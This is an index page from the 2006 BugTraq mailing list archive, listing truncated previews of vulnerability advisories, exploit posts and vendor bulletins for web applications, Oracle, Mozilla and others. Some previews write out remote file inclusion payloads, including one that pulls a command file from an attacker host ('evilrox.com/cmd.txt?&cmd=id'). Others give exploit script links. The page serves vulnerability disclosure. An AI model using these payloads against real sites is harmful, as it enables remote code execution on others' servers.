BugTraq Mode:
(Page 1156 of 1748)  < Prev  1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161  Next >
W-Agora 4.20 XSS 2006-04-29
r0xes ratm gmail com
PLEASE NOTE: I am not sure if HTML is an option. I looked through the Administration panel and did not see an option for it, and the fact that there is no BBcode leads me to believe that this is the method of BBCode/etc.

W-Agora is a fairly 'nice' bulletin board written in PHP. It allows multiple

Re: phpMyForum Cross Site Scripting & CRLF injection 2006-04-25
chris phpmyforum de
There is no such bug and even if I'm wrong, there's already version 4.1.3!

TopList <= 1.3.8 (PHPBB Hack) Remote File Inclusion Vulnerability 2006-04-28
mfoxhacker gmail com
####################################################

# IHST - MFox > MFoxHacker (at) gmail (dot) com #

####################################################

- Vendor = TopList (PHPBB)

- Target = list.php

- Exploit :

http://[target]/top/list.php?returnpath=[shell_url]

Bug Discovered by

Invision Power Board 2.1.5 POC 2006-04-27
Javier Olascoaga (jolascoaga 514 es)
Proof of concept for http://www.securityfocus.com/bid/17695/ can be
found in www.514.es

LINK: http://www.514.es/download/invvy-v2.pl

Best regards,

- J

#!/usr/bin/perl
# Wed Apr 26 16:44:15 CEST 2006 jolascoaga (at) 514 (dot) es
#
# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept
#
# r

Re: VWar Path Disclosure 2006-04-26
spic g00ns net
The remote code execution was found by uid0 from www.exploitercode.com. He published it before anyone else did, then it was ripped.

poll.pl<--remote commands execution exploit 2006-04-26
CrAzY CrAcKeR hotmail com
Subject:poll.pl<--remote commands execution

>>>>>>>>-----------------<<<<<<<<

found by:CrAzY CrAcKeR
::::...alshmokh team...::::
Site: http://www.alshmokh.com

>>>>>>>>-----------------<<<<<<<<

Bug is found in this script:
open (HAND,"/web/htdocs/ronpoll/question") || die "Error opening file poll

[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability 2006-04-28
botan linuxmail org
Website : http://www.i-rater.com

Risk : High

Class : Remote

References :

http://www.securityfocus.com/bid/17623

Credits : B3g0k,Nistiman,Flot,Netqurd and all my friends

Remote Code :

http://www.site.com/admin/config_settings.tpl.php?include_path=http://www.evilrox.com/cmd.txt?&cmd=id

RE: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-28
Kornbrust, Alexander (ak red-database-security com) (1 replies)
Cesar, David and Steve,

I agree with your opinion. Oracle is not really fast fixing security
issues.

Currently I have 40+ OPEN/UNFIXED security issues in Oracle products. A
detailed list from Oracle secalert (Report March 2006) can be found at
the end of this email or (the latest version) on my w

Re: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-28
David Litchfield (davidl ngssoftware com)
Neomail.pl Local Cross Site Scripting 2006-04-28
outlaw aria-security net
#Aria-Security.net Advisory

#Discovered by: O.u.t.l.a.w

#< www.Aria-security.net >

#Gr33t to: A.u.r.a & R@1D3N & Smok3r

#-----------------------------------------------------------

Software: Neomail WebMail

Link: http://neomail.sourceforge.net/

Attack method: Cross Site Scripting

advisory:

[Kurdish Security #2] Artmedic Event Remote File Include Vulnerability 2006-04-28
botan linuxmail org


Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html

#Artmedic Event Remote File Include Vulnerability

#Website : http://www.artmedic.de/

#Script : Artmedic Event Script

#Risk : High

#Class : Remote

#Greetz : B3g0k,Nistiman,Flot,Netqurd etc

[ GLSA 200604-18 ] Mozilla Suite: Multiple vulnerabilities 2006-04-28
Thierry Carrez (koon gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200604-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP) 2006-04-28
botan linuxmail org
Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html

#CoolMenus Event Remote File Include Vulnerability#

#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]

#Script : CoolMenus v4.0 Event Script

#Risk : High

#Class : Remo

[Argeniss] Alert - Yahoo! Mail XSS vulnerability 2006-04-28
Cesar (cesarc56 yahoo com)
Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicious script being executed on users'
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail logi

[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability 2006-04-28
the_day echo or id
---------------------------------------------------------------------------------------

[ECHO_ADV_31$2006] Sws Web Server 0.1.7 Strcpy() & Syslog() Format String Vulnerability

---------------------------------------------------------------------------------------

Author : Dedi Dwianto

Da

WinISO/UltraISO/MagicISO/PowerISO Directory Traversal Vulnerability 2006-04-28
Sowhat (smaillist gmail com)
WinISO/UltraISO/MagicISO/PowerISO Directory Traversal Vulnerability

By Sowhat of Nevis Labs
Date: 2006.04.28

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060428.txt

CVE: N/A

Vendor

WinISO Computing Inc.
EZB Systems, Inc.
MagicISO Inc.
PowerISO Computing, Inc.

Affected Softw

Secunia Research: Servant Salamander unacev2.dll Buffer Overflow Vulnerability 2006-04-28
Secunia Research (remove-vuln secunia com)
======================================================================

Secunia Research 28/04/2006

- Servant Salamander unacev2.dll Buffer Overflow Vulnerability -

======================================================================
Table of Contents

Affected Software.

Cireos Portal Cross Site Scripting 2006-04-28
outlaw aria-security net
#Aria-Security.net Advisory

#Discovered by: O.u.t.l.a.w

#< www.Aria-security.net>

#Gr33t to: A.u.r.a & R@1D3N & Smok3r

#-----------------------------------------------------------

Software: SirceOS Operative Solutions

Link: http://www.circeos.it

Attack method: Cross Site Scripting

advisory

Re: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-27
Steven M. Christey (coley mitre org) (1 replies)

>The recent Oracle exploit posted to Bugtraq
>(http://www.securityfocus.com/archive/1/431353) is actually an 0day
>and has no patch.

The referenced exploit seems to use GET_DOMAIN_INDEX_METADATA with a
TYPE_NAME that references an attacker-defined package with a
(modified?) ODCIIndexGetMeta functi

Re: Recent Oracle exploit is _actually_ an 0day with no patch 2006-04-28
David Litchfield (davidl ngssoftware com) (1 replies)
BL4's SMTP server BufferOverflow Vulnerable 2006-04-27
the_day echo or id
---------------------------------------------------------------------------

[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable

---------------------------------------------------------------------------

Author : Dedi Dwianto

Date : April, 27th 2006

Location : Ind

[SECURITY] [DSA 1045-1] New OpenVPN packages fix arbitrary code execution 2006-04-27
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1045-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
April 27th, 2006

[USN-275-1] Mozilla vulnerabilities 2006-04-27
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-275-1 April 27, 2006
mozilla vulnerabilities
CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0748,
CVE-2006-0749, CVE-2006-1727, CVE-2006-1728, CVE-2006-1729,
CVE-2006-1730, CVE-2006-1731, CVE-2006-1732

Re: Instant Photo Gallery <= Multiple XSS 2006-04-27
Steven M. Christey (coley mitre org)

security curmudgeon mentioned:

> /portfolio.php?cat_id=[XSS]

Based on source inspection of 1.0.2, this parameter is cleansed.

line 31 of portfolio.php says:

$catId = $dbFilter->db_clean_input($_GET['cat_id'], 'integer');

which looks like it's going to do input validation as an integer.

BUT

[SECURITY] [DSA 1046-1] New Mozilla packages fix several vulnerabilities 2006-04-27
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1046-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
April 27th, 2006

[security bulletin] HPSBMA02113 SSRT061148 rev.1 - HP Oracle for OpenView (OfO) Critical Patch Update April 2006 2006-04-27
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00651782
Version: 1

HPSBMA02113 SSRT061148 rev.1 - HP Oracle for OpenView (OfO)
Critical Patch Update April 2006

NOTICE: The information in this Security Bulletin should be acted
upon as soon as

[security bulletin] HPSBUX02075 SSRT051074 rev.4 - HP-UX Running xterm Local Unauthorized Access 2006-04-27
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00555516
Version: 4

HPSBUX02075 SSRT051074 rev.4 - HP-UX Running xterm Local
Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Rele

Copyright 2010, SecurityFocus